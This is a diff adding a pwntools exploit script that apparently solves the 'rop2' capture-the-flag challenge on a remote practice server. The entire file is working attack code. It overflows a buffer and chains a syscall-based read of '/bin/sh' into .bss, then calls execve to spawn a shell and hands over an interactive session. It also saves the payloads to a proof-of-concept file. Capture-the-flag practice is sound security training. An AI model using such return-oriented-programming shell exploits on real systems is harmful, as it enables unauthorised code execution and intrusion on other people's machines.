Renamed

NX/rop2/answer.py

@@ -0,0 +1,36 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os
+context(arch = "i386",os = "linux", log_level = "debug")
+
+p = remote("hackme.inndy.tw", 7703)
+#p = process('./rop2')
+elf = ELF('./rop2')
+
+syscall_plt = elf.plt['syscall']
+overflow_func = elf.sym['overflow']
+main_func = elf.sym['main']
+bss_buf = elf.bss()
+
+p.recvuntil("ropchain:")
+payload1 = 0xc*'z'+p32(0)+p32(syscall_plt)+p32(main_func)+p32(3)+p32(0)+p32(bss_buf)+p32(1024)
+p.sendline(payload1)
+
+payload2 = "/bin/sh\x00"
+p.sendline(payload2)
+
+p.recvuntil("ropchain:")
+payload3 = 0xc*'z'+p32(0)+p32(syscall_plt)+p32(main_func)+p32(11)+p32(bss_buf)+p32(0)+p32(0)
+p.sendline(payload3)
+
+with open("poc.txt", "w") as f:
+    f.write(payload1)
+    f.write("\n")
+    f.write(payload2)
+    f.write("\n")
+    f.write(payload3)
+    f.write("\n")
+
+p.interactive()